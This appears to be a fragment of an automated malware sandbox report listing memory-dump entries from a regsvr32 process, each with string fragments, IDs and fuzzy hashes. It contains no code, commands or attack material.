                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0Au$]6
                                                                                        • API String ID: 0-775207805
                                                                                        • Opcode ID: 41d6d67fb4784ff97a0c8e7ec9a302166e0b0c9de4538925550087b6d031b924
                                                                                        • Instruction ID: 6edab2825e6f92fa7d6d5649e6783b0aef41eda7633721283519dacdcc01bd9d
                                                                                        • Opcode Fuzzy Hash: 41d6d67fb4784ff97a0c8e7ec9a302166e0b0c9de4538925550087b6d031b924
                                                                                        • Instruction Fuzzy Hash: 2DE1D7706047889FCBBEDF24CC897DA7BA8FB46704F904619E9C98E250DB745748CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: S9$qrd
                                                                                        • API String ID: 0-2332744662
                                                                                        • Opcode ID: dccb7ee8ec7dfb8e0809544b932b2caf2d93c57dd19aa3a9b169f23ded853006
                                                                                        • Instruction ID: d3a666ff84b181fad27f9c2352a1e83f1b6bb5c561d3220c9e7978bd2dadc88f
                                                                                        • Opcode Fuzzy Hash: dccb7ee8ec7dfb8e0809544b932b2caf2d93c57dd19aa3a9b169f23ded853006
                                                                                        • Instruction Fuzzy Hash: 6EB1357590660CCFCB69DFA4C08A6DDBBF1EF68344F104519E812AB262CBB0D919CB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: hw}2$4&t
                                                                                        • API String ID: 0-1169878757
                                                                                        • Opcode ID: 858c4deae444743a57c26792a91effe053d1d8b489a12bfa541918911fc2fcd6
                                                                                        • Instruction ID: fd20564dcf1a671b287a6600624e9fb92dead2187b8d5629211a6de17e7e6b55
                                                                                        • Opcode Fuzzy Hash: 858c4deae444743a57c26792a91effe053d1d8b489a12bfa541918911fc2fcd6
                                                                                        • Instruction Fuzzy Hash: AEB168B590420CCFDB68CF78C45A5DD7BF1FB08308F60612AE826AA262D774D919CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: JMWd$a[
                                                                                        • API String ID: 0-3276560754
                                                                                        • Opcode ID: 94f2740beabb4555a63fe109c076897c128458c56f4cbcfe5625600f94c775f6
                                                                                        • Instruction ID: 3b54873520b9a846c0abc3e4022efff23af49e59c185cad729b6d512d224c3a2
                                                                                        • Opcode Fuzzy Hash: 94f2740beabb4555a63fe109c076897c128458c56f4cbcfe5625600f94c775f6
                                                                                        • Instruction Fuzzy Hash: D5A106706047889FDBBACF18CC857DE3BA8FB46748F504229E8CA8E254CB745749CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %[$-
                                                                                        • API String ID: 0-2535708364
                                                                                        • Opcode ID: 65f60e6b5a076c6be367ab0f8efb072c07a091d19f07b8aff3e0ecb4ccd985c8
                                                                                        • Instruction ID: a7604732bdc10a899b7b050bfde45695c0722dd065d5eed74db0117fa162c574
                                                                                        • Opcode Fuzzy Hash: 65f60e6b5a076c6be367ab0f8efb072c07a091d19f07b8aff3e0ecb4ccd985c8
                                                                                        • Instruction Fuzzy Hash: 1F81627050074ECBDB99DF14C88A7DE3BA0FB28389F114219FC85962A0D778C699CBC4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /Mr$i:O:
                                                                                        • API String ID: 0-3426536595
                                                                                        • Opcode ID: 8fba9de9c6c3b1e5047e1d7641fef574ac2ea6f46defdcfa8fbb4029ea408963
                                                                                        • Instruction ID: 3eba081f804be6fa3a9d4fb4db8c82f5607d3411af965209965460f3089a80c7
                                                                                        • Opcode Fuzzy Hash: 8fba9de9c6c3b1e5047e1d7641fef574ac2ea6f46defdcfa8fbb4029ea408963
                                                                                        • Instruction Fuzzy Hash: 7C91087050438C8FDBBADF24C8AA7DE7BA1FB5A304F50461EEA4E8E250DB749644CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 6|4$;|-
                                                                                        • API String ID: 0-2897245347
                                                                                        • Opcode ID: 35605434c5429477d06d2e5b9b1bfa34856c77736f87f3e727847c01dfef7208
                                                                                        • Instruction ID: 839a7c11e172a9a14e1c367a044feafa9aab422ef7ede3a919e78660e0b6ca0a
                                                                                        • Opcode Fuzzy Hash: 35605434c5429477d06d2e5b9b1bfa34856c77736f87f3e727847c01dfef7208
                                                                                        • Instruction Fuzzy Hash: C0714B7090474D8FCF88DFA4C8866EEBBF0FB48308F114619E88AA7251D7789645CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: U$U#
                                                                                        • API String ID: 0-861755185
                                                                                        • Opcode ID: 2086c1731bcfc2cec1958e1d1a3f8cb927817e2dd584414818c7a6dfab91bab1
                                                                                        • Instruction ID: 3d07f47d2f6b9c27b0e4fe7d5859b29f381f1ada24735b7dc646a2f801c86eef
                                                                                        • Opcode Fuzzy Hash: 2086c1731bcfc2cec1958e1d1a3f8cb927817e2dd584414818c7a6dfab91bab1
                                                                                        • Instruction Fuzzy Hash: 0C515C7150C7449FC7A8DF18D4C67AAB7E0FB88310F90991DF8CAC7251EB70A9598B82
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: fK$Pr
                                                                                        • API String ID: 0-2696692655
                                                                                        • Opcode ID: 9489b844c734f0d344b598ec7bcb8736a735df1c6bae6eaa62d1b735c6b442f4
                                                                                        • Instruction ID: dfe3628fe45c31a405763d5fff7ed8f4d77ec04c4bb6b45016b3f1679df2575b
                                                                                        • Opcode Fuzzy Hash: 9489b844c734f0d344b598ec7bcb8736a735df1c6bae6eaa62d1b735c6b442f4
                                                                                        • Instruction Fuzzy Hash: 907116B090474E8FDB88CF28C88A6DE7BF0FB18358F515219FC4AA6260D774D598CB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: n\$z+&
                                                                                        • API String ID: 0-1414119057
                                                                                        • Opcode ID: f24be46eeb560fbb290949dbfd7d05873455e782ddfe7ec7ed40b48d6508653b
                                                                                        • Instruction ID: eeb2c5940d29436bcd670e7d8a2b521530b450e3042878bcb8e4954d48490cde
                                                                                        • Opcode Fuzzy Hash: f24be46eeb560fbb290949dbfd7d05873455e782ddfe7ec7ed40b48d6508653b
                                                                                        • Instruction Fuzzy Hash: 22612070A04B0C8BCBA9DF98D48AADDB7F1FB58344F00411DE846A7390DBB8950ACB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .$50
                                                                                        • API String ID: 0-2436285167
                                                                                        • Opcode ID: 84d2de074a5e6e1a5d921b58512406c284d81fdc35452f42d6b6a069db9f8ad4
                                                                                        • Instruction ID: 63debb9af518b5fca5d59737c01840b12b974a655eea7ff458552c4fa6b671e5
                                                                                        • Opcode Fuzzy Hash: 84d2de074a5e6e1a5d921b58512406c284d81fdc35452f42d6b6a069db9f8ad4
                                                                                        • Instruction Fuzzy Hash: 3671DF705087848FD769CF28C58965ABBF0FBC6344F008A1DF68686260CBB6D949CF03
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,{$uC
                                                                                        • API String ID: 0-1099860252
                                                                                        • Opcode ID: 2af00e218d12abdb99ef7e76f2ba815a0f7da0c0d962cc97f106519d062cd6fe
                                                                                        • Instruction ID: df29777c25f03bc51b29c5e68a382a2b48421fa47568a9dd7f4acde699563025
                                                                                        • Opcode Fuzzy Hash: 2af00e218d12abdb99ef7e76f2ba815a0f7da0c0d962cc97f106519d062cd6fe
                                                                                        • Instruction Fuzzy Hash: 28612D71A04B0C8FDBA9DF98D08A7DEB7F1FB48344F004119E406E7291DBB8990ADB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "C$*6TO
                                                                                        • API String ID: 0-2251823003
                                                                                        • Opcode ID: 11a52743e991166c772ae58171141d3b918ce8d4020b5bd660e65aa41626bcf5
                                                                                        • Instruction ID: 1108d3b1afe4df31317b10417d35e55e698c36e02fd161062712c06e930ceb12
                                                                                        • Opcode Fuzzy Hash: 11a52743e991166c772ae58171141d3b918ce8d4020b5bd660e65aa41626bcf5
                                                                                        • Instruction Fuzzy Hash: 598166B550130DCFCB98DF28C58A59D3BA8FB49308F40812AFC1E9A264D3B4E659DB46
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: _ N$nkz
                                                                                        • API String ID: 0-4083044659
                                                                                        • Opcode ID: a2e505ed0ed44acca9d37efa5475ae9917bfda84fefcb3a28f95bfb4043916ce
                                                                                        • Instruction ID: b07831c94fe2cbd7ac58294498593f0ee6961182af88fd212fccb4805bec53d6
                                                                                        • Opcode Fuzzy Hash: a2e505ed0ed44acca9d37efa5475ae9917bfda84fefcb3a28f95bfb4043916ce
                                                                                        • Instruction Fuzzy Hash: 39513971D04A1D8BDF99CFA8C5457EEBBB1FB48344F108119E415BB250CBB89A09CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LiD+$?
                                                                                        • API String ID: 0-3739020763
                                                                                        • Opcode ID: bc963e11fa834f262c09c021a462739b615030ee8f9d2598156052fa386473db
                                                                                        • Instruction ID: 2f7d624153028320349e4a0adb7356b45dc1f3746b227896fac10cb383cb0630
                                                                                        • Opcode Fuzzy Hash: bc963e11fa834f262c09c021a462739b615030ee8f9d2598156052fa386473db
                                                                                        • Instruction Fuzzy Hash: F35191B590034E8FCB48DF64D48A8DE7FB0FB68398F214619E815A7210D7B496A4CFD5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %&Iv$\o
                                                                                        • API String ID: 0-2950252169
                                                                                        • Opcode ID: e3b847a27b1fdf8219116b43965b4243214bd6bbc489cbb0191219741f6e6deb
                                                                                        • Instruction ID: 7d8516b09fccf329ce1ee45da69bc8f76dfc96f1b67d05b04ebb17f55f6537e3
                                                                                        • Opcode Fuzzy Hash: e3b847a27b1fdf8219116b43965b4243214bd6bbc489cbb0191219741f6e6deb
                                                                                        • Instruction Fuzzy Hash: 7041C2B090074E8FCB48DF28C88A4DE7FB1FB68398F514619EC56A7250D7B496A4CBC4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: |<$P;
                                                                                        • API String ID: 0-71676942
                                                                                        • Opcode ID: d8b30cb9b0bbde5f967eaf6e88493efae150f481542faaeeec2b89fd53c9bf9b
                                                                                        • Instruction ID: b926ab4478da67f81816527f76e4a4189747c2b1a61b322854fb240660ec53f5
                                                                                        • Opcode Fuzzy Hash: d8b30cb9b0bbde5f967eaf6e88493efae150f481542faaeeec2b89fd53c9bf9b
                                                                                        • Instruction Fuzzy Hash: 0F41F4B190078ECFCF48DF68C88A5DE7BB0FB58318F10461DE82AA6250D3B49665CF84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #X$< @
                                                                                        • API String ID: 0-1734357072
                                                                                        • Opcode ID: efe0763d8a7a245e8cb996b606fb90cb3ba626e454cc1a7dd4141ea463f73824
                                                                                        • Instruction ID: 53d5526a666e2e4b0aa3df313d94281727ef5dde582db7952040e92a2ea044da
                                                                                        • Opcode Fuzzy Hash: efe0763d8a7a245e8cb996b606fb90cb3ba626e454cc1a7dd4141ea463f73824
                                                                                        • Instruction Fuzzy Hash: E241C3B090078E8FCF48DF68C95A5DE7BB0FB58348F104A1DEC6AA6250D3B49665CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .B$X&x
                                                                                        • API String ID: 0-2125001607
                                                                                        • Opcode ID: b56e4be042cf3e20bfd4171d949980e8bdde88a4c8b77932d249eea416ff403a
                                                                                        • Instruction ID: 406be0e8b3d674fc45ad7aec45ce8f3a41fae9dcbe4fb503a73b8d88e4a7390b
                                                                                        • Opcode Fuzzy Hash: b56e4be042cf3e20bfd4171d949980e8bdde88a4c8b77932d249eea416ff403a
                                                                                        • Instruction Fuzzy Hash: F541C3B190034E8BDF48DF68C98A4DE7BB1FB58358F00461DE866AB350D3B89665CF85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D-o$S1
                                                                                        • API String ID: 0-2248371139
                                                                                        • Opcode ID: b2af9136cfd81d84eb1aedf16953768fff15e9d6dc77d4de408be5ef0b131a39
                                                                                        • Instruction ID: c824313cc5550ea8d08e24e936909b38c1116e4b52b8e35a6cfdfb4e8fb0d5b5
                                                                                        • Opcode Fuzzy Hash: b2af9136cfd81d84eb1aedf16953768fff15e9d6dc77d4de408be5ef0b131a39
                                                                                        • Instruction Fuzzy Hash: 7F418F7090074E8FCF88CF68C48A5DEBFB0FB28398F144619E856A6250D3B496A5CFC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ")v$kNTY
                                                                                        • API String ID: 0-925696221
                                                                                        • Opcode ID: 2d468f080be7dc4ac37fbc5ab55ab08a385f91380d02a95960c4866fb202e0cd
                                                                                        • Instruction ID: 3d1cde25fc61112586e0ccbc864a2b9889115514f3b9559dcc74a8c2fbc402f5
                                                                                        • Opcode Fuzzy Hash: 2d468f080be7dc4ac37fbc5ab55ab08a385f91380d02a95960c4866fb202e0cd
                                                                                        • Instruction Fuzzy Hash: 49317CB16187858B8348DF28C45641ABBE1FBCD70CF544B2DF4CAAB251D738D6128B4B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: O$\u
                                                                                        • API String ID: 0-3775190597
                                                                                        • Opcode ID: 81226de3c00d9588fcdb855554b2562b3d5d50c3db8a2dd8ff0fab91db437570
                                                                                        • Instruction ID: b3d17dff366e7d439aca65bd494037a1e9e1cb33d0f26cc5f3c7e2fad645fe6e
                                                                                        • Opcode Fuzzy Hash: 81226de3c00d9588fcdb855554b2562b3d5d50c3db8a2dd8ff0fab91db437570
                                                                                        • Instruction Fuzzy Hash: 5B31C4B0528781AFC798DF28D09991ABBF1FBC9304F806A1DF98A8B350D774D845CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: +N$:s[
                                                                                        • API String ID: 0-2992701377
                                                                                        • Opcode ID: 59945e4bfd5c1812b410bc992af75b99beb9f24da50121ece688e224e72b4b08
                                                                                        • Instruction ID: 2af45dfac4c7ae0da7497fa8c295952f08e7f96bebb69c710dc1a077a3b8364b
                                                                                        • Opcode Fuzzy Hash: 59945e4bfd5c1812b410bc992af75b99beb9f24da50121ece688e224e72b4b08
                                                                                        • Instruction Fuzzy Hash: 443192B5528381ABC388DF28C48A81FBBE1FBC9359F806A1DF8C696261D734D5458B43
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 'yN$k
                                                                                        • API String ID: 0-35230329
                                                                                        • Opcode ID: 664b9cbffe37651652d085acf9af43cce7b6a19192dfc0ee1d7ff8525738b321
                                                                                        • Instruction ID: 07b651401a32326000ca6cd35722393aebb0696fbf8e2d5e5a89f081ef8d3ba1
                                                                                        • Opcode Fuzzy Hash: 664b9cbffe37651652d085acf9af43cce7b6a19192dfc0ee1d7ff8525738b321
                                                                                        • Instruction Fuzzy Hash: DE318FB191478E8BDB48DF68D8494DF3BF0FB58308F004A29EC6A9A250D7B49664CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ]2F$lt
                                                                                        • API String ID: 0-3307743551
                                                                                        • Opcode ID: e35954fd64214c4dc75024e05a92e9afc61a62ba820b5d5e41e037a5dcd882da
                                                                                        • Instruction ID: b2e8e3d622355c2c7a8d87ad16832996e77f732c72c2020fcd3ed114b96953d1
                                                                                        • Opcode Fuzzy Hash: e35954fd64214c4dc75024e05a92e9afc61a62ba820b5d5e41e037a5dcd882da
                                                                                        • Instruction Fuzzy Hash: BC218C70528385ABC798CF24C1CA94BBBE1FBD4758F906A0DF8828B264D774D909CB43
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: t2i.
                                                                                        • API String ID: 0-2317288456
                                                                                        • Opcode ID: ddf1efb97a931d6c5f3ee8c67c3fa2b44aa9af6db9e4e5e1b98fbf81237c32be
                                                                                        • Instruction ID: 45fd1b4f7d9ae1bb3a1595fd0447dfa3858b4c22850e921c91e36994c5fa5290
                                                                                        • Opcode Fuzzy Hash: ddf1efb97a931d6c5f3ee8c67c3fa2b44aa9af6db9e4e5e1b98fbf81237c32be
                                                                                        • Instruction Fuzzy Hash: F4C17C709197489BD7D6DF18C48579EBBE0FB88344F906A1EF486C72A0CB34DA49CB02
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !
                                                                                        • API String ID: 0-133318149
                                                                                        • Opcode ID: 9a28524a62feba04ad602aea3c6b43a9e37f0bb3cb72c69032c5b680e6eaa856
                                                                                        • Instruction ID: 4d490125f0736c0523a0bc8c54046deb818a488a36854fcf26dc18eb231edbc7
                                                                                        • Opcode Fuzzy Hash: 9a28524a62feba04ad602aea3c6b43a9e37f0bb3cb72c69032c5b680e6eaa856
                                                                                        • Instruction Fuzzy Hash: 94C1277090474D8BDF48DF68C88A6EE7BF1FB48358F15821DE84AA7250C7789949CF85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: GP
                                                                                        • API String ID: 0-809347306
                                                                                        • Opcode ID: c18687982be6c1a2fdabfac97a268a3404b4fe9754ccd0dba6adaab26aa3d97e
                                                                                        • Instruction ID: b8cc07b6ee5f07dffcf88ae53723e0b0b514af2364763fc1c4f878c703b2f424
                                                                                        • Opcode Fuzzy Hash: c18687982be6c1a2fdabfac97a268a3404b4fe9754ccd0dba6adaab26aa3d97e
                                                                                        • Instruction Fuzzy Hash: 35C18BB190060DCFCF68CF78D55A59D7BF1BB48308F606229F826AA2A2D3B49915CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: G
                                                                                        • API String ID: 0-4067352199
                                                                                        • Opcode ID: 571051391216adea76df2afa30ecc8bad161d89b390d9c97388838629c1a5ca4
                                                                                        • Instruction ID: 225e36911d9d240547ab15c987b60d96220a9315f181ed6db9e7231e26a901aa
                                                                                        • Opcode Fuzzy Hash: 571051391216adea76df2afa30ecc8bad161d89b390d9c97388838629c1a5ca4
                                                                                        • Instruction Fuzzy Hash: 54A11871A0460CCFDF59DFA8C44A6DDB7F2FB48344F104529E816BB261CB749909CBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
